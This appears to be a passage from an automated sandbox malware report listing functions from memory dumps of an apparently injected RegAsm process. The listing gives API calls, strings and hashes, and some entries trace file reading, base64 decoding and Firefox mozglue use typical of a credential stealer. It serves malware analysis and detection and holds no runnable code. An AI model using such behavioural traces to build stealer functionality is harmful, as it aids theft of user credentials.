                                                                                                                                                                                                                                                                                                  • API String ID: 515946987-974132213
                                                                                                                                                                                                                                                                                                  • Opcode ID: 94d49bf5eed57990bb565d728c9404399d6025bb18d034b4574d35f7f8a62bdb
                                                                                                                                                                                                                                                                                                  • Instruction ID: f1cab759c64a51ab36b00e3123f44d1aff27cf748a20ffaddcf602daf8714b48
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94d49bf5eed57990bb565d728c9404399d6025bb18d034b4574d35f7f8a62bdb
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4851E9B1D00218BBCB14EBA0DC46FED7B79AB1D704F40465EF61563182EBBC67448BA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C805E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C805E9D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C8156EE,?,00000001), ref: 6C815B85
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815B50: EnterCriticalSection.KERNEL32(6C87F688,?,?,?,6C8156EE,?,00000001), ref: 6C815B90
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815B50: LeaveCriticalSection.KERNEL32(6C87F688,?,?,?,6C8156EE,?,00000001), ref: 6C815BD8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C815B50: GetTickCount64.KERNEL32 ref: 6C815BE4
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C805EAB
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C805EB8
                                                                                                                                                                                                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C805ECF
                                                                                                                                                                                                                                                                                                  • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C806017
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F4310: moz_xmalloc.MOZGLUE(00000010,?,6C7F42D2), ref: 6C7F436A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F4310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C7F42D2), ref: 6C7F4387
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000004), ref: 6C805F47
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 6C805F53
                                                                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 6C805F5C
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 6C805F66
                                                                                                                                                                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C805F7E
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000024), ref: 6C805F27
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CA10: mozalloc_abort.MOZGLUE(?), ref: 6C80CAA2
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8055E1), ref: 6C805E8C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                                                                                                                                                                  • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8055E1), ref: 6C80605D
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8055E1), ref: 6C8060CC
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                                                                                                                                                                                                                                                  • String ID: GeckoMain
                                                                                                                                                                                                                                                                                                  • API String ID: 3711609982-966795396
                                                                                                                                                                                                                                                                                                  • Opcode ID: c2fd6505037faa73201c4654c0c91e4d2e2872ccf7ee4dfa13fecf8ca247f4f2
                                                                                                                                                                                                                                                                                                  • Instruction ID: 89140e8e7d9b0753c580c55ffcf74b317103bebfc70ad52cd080242a0bcc2c22
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2fd6505037faa73201c4654c0c91e4d2e2872ccf7ee4dfa13fecf8ca247f4f2
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E71C4B06047409FD721DF29C58466ABBF0BF55308F444D7DE88687B52E730E988CBA2
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 004127A0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 142stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,block,00000000,?,00417F3E), ref: 004127D8
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 004127E3
                                                                                                                                                                                                                                                                                                  • strtok_s.MSVCRT ref: 004127FA
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExitProcessstrtok_s
                                                                                                                                                                                                                                                                                                  • String ID: block
                                                                                                                                                                                                                                                                                                  • API String ID: 3407564107-2199623458
                                                                                                                                                                                                                                                                                                  • Opcode ID: bfbb5e6680c5156191c9326d26d90960a60fe579e79d5916bd39a2dec37d8f59
                                                                                                                                                                                                                                                                                                  • Instruction ID: 18f11e5dc8a80357da29375226d9a7e0c3b7c9f24393673a8809f25241204b79
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bfbb5e6680c5156191c9326d26d90960a60fe579e79d5916bd39a2dec37d8f59
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B41E4B5B64350ABDB119FB9AE45BE777A8FB09704F20052BF802D3684E7BC9450CB19
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00413790 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 207stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004137C3
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004137D5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411670: SHGetFolderPathA.SHELL32(00000000,.kB,00000000,00000000,?,00000000), ref: 004116A8
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 00413801
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,01572220), ref: 00413820
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00413834
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,01571F50), ref: 00413848
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411610: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,00421AB8,000000FF,?,0040E72A,?,00000000,00000000,00000000,?,?), ref: 00411637
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040CDE0: StrStrA.SHLWAPI(00000000,01571F98,?,?,?,?,?,?,?,?,?,?,?,00421750,?), ref: 0040CE4B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040CDE0: memcmp.MSVCRT ref: 0040CE89
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000), ref: 00406EB7
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406ECD
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406EE8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F01
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406E80: CloseHandle.KERNEL32(00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F29
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00411930: GlobalAlloc.KERNEL32(00000000,004138D9,?,?,?,004138D9,?,?), ref: 0041193B
                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,01572460), ref: 004138E5
                                                                                                                                                                                                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 004139BA
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406F50: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004064DB,00000000,00000000), ref: 00406F77
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406F50: LocalAlloc.KERNEL32(00000040,00000000,?,004064DB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406F86
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406F50: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004064DB,00000000,00000000), ref: 00406F9D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406F50: LocalFree.KERNEL32(?,?,004064DB,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406FAC
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407110: memcmp.MSVCRT ref: 0040714B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407110: memset.MSVCRT ref: 00407179
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407110: LocalAlloc.KERNEL32(00000040,?), ref: 004071B0
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,00000000), ref: 0041395E
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,0042734D,?,?,?,?,000003E8), ref: 0041397B
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,?), ref: 00413996
                                                                                                                                                                                                                                                                                                  • lstrcat.KERNEL32(?,004276B0), ref: 004139A2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$AllocFileLocal$memset$BinaryCryptFreeGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: PrA$PrA
                                                                                                                                                                                                                                                                                                  • API String ID: 4228189460-3271464785
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5d050f0467563e56b5ff0f64b8d4a3fe8ac4c6073db89f2e4087ba7c12a54d0a
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8d31d6c3a2303427a5c13a710ec4bedc1ceffce71b540cfe1a589f73e2f97795
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d050f0467563e56b5ff0f64b8d4a3fe8ac4c6073db89f2e4087ba7c12a54d0a
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F71BAB5D00218ABDB14EFE0CC85EEF7779AB58304F00456EF615A3281DB78AB44CBA5
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C809590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F31C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C7F3217
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F31C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C7F3236
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F31C0: FreeLibrary.KERNEL32 ref: 6C7F324B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F31C0: __Init_thread_footer.LIBCMT ref: 6C7F3260
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F31C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C7F327F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F31C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C7F328E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7F32AB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C7F32D1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C7F32E5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C7F31C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C7F32F7
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C809675
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C809697
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C8096E8
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C809707
                                                                                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 6C80971F
                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C809773
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C8097B7
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32 ref: 6C8097D0
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32 ref: 6C8097EB
                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C809824
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                                                                                                                                                                                                                  • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 3361784254-3880535382
                                                                                                                                                                                                                                                                                                  • Opcode ID: 09e8706d1c302401373f28600765603798c6c05aad98d15e826f3afc3caae0c0
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1cebbb68aa9bbebb7aaafec93d2299b00351d9b92181dbe0f9d36a94b61447e9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09e8706d1c302401373f28600765603798c6c05aad98d15e826f3afc3caae0c0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DD61D0717042559BDF318F69DE8CA9E3BB1EB8B358F104939E91583780E734A844CBE1
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C856660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(6C87F618), ref: 6C856694
                                                                                                                                                                                                                                                                                                  • GetThreadId.KERNEL32(?), ref: 6C8566B1
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C8566B9
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C8566E1
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(6C87F618), ref: 6C856734
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 6C85673A
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(6C87F618), ref: 6C85676C
                                                                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 6C8567FC
                                                                                                                                                                                                                                                                                                  • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C856868
                                                                                                                                                                                                                                                                                                  • RtlCaptureContext.NTDLL ref: 6C85687F
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                                                                                                                                                                                                                                                  • String ID: WalkStack64
                                                                                                                                                                                                                                                                                                  • API String ID: 2357170935-3499369396
                                                                                                                                                                                                                                                                                                  • Opcode ID: 17962cfd087c987168e516660885e8b8a3c9682ce8b79879086b9662b5b90eb3
                                                                                                                                                                                                                                                                                                  • Instruction ID: 19f779d5744440bb838aefe4e8f0f252cfc90cd4992be05d7fdd2e32ad317c80
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 17962cfd087c987168e516660885e8b8a3c9682ce8b79879086b9662b5b90eb3
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5251B071A09311AFD731CF25C948A5EBBF4BF89718F40492DF99887740E7B0A914CB92
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 6C83DE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C804A68), ref: 6C83945E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C839470
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C839482
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C839420: __Init_thread_footer.LIBCMT ref: 6C83949F
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83DE73
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83DF7D
                                                                                                                                                                                                                                                                                                  • AcquireSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83DF8A
                                                                                                                                                                                                                                                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8), ref: 6C83DFC9
                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C83DFF7
                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C83E000
                                                                                                                                                                                                                                                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C804A68), ref: 6C83DE7B
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8394EE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C8394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C839508
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CBE8: GetCurrentProcess.KERNEL32(?,6C7F31A7), ref: 6C82CBF1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 6C82CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7F31A7), ref: 6C82CBFA
                                                                                                                                                                                                                                                                                                  • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C804A68), ref: 6C83DEB8
                                                                                                                                                                                                                                                                                                  • free.MOZGLUE(00000000,?,6C804A68), ref: 6C83DEFE
                                                                                                                                                                                                                                                                                                  • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C83DF38
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • [I %d/%d] locked_profiler_stop, xrefs: 6C83DE83
                                                                                                                                                                                                                                                                                                  • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C83E00E
                                                                                                                                                                                                                                                                                                  • <none>, xrefs: 6C83DFD7
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2074948974.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2074887473.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075153651.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075205638.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2075228583.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_6c7f0000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                                                                                                                                                                                                                                                  • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                                                                                                                                                                                                                                                  • API String ID: 1281939033-809102171
                                                                                                                                                                                                                                                                                                  • Opcode ID: 96db00d5d2c851d06350b42485bd9cad6c6743e20fe960368fb1ff27f655dd59
                                                                                                                                                                                                                                                                                                  • Instruction ID: ae8948d423ecfab3b96d2e3aadc5275210b51c31f7f8c5bf74a7ef9d13ea8cf7
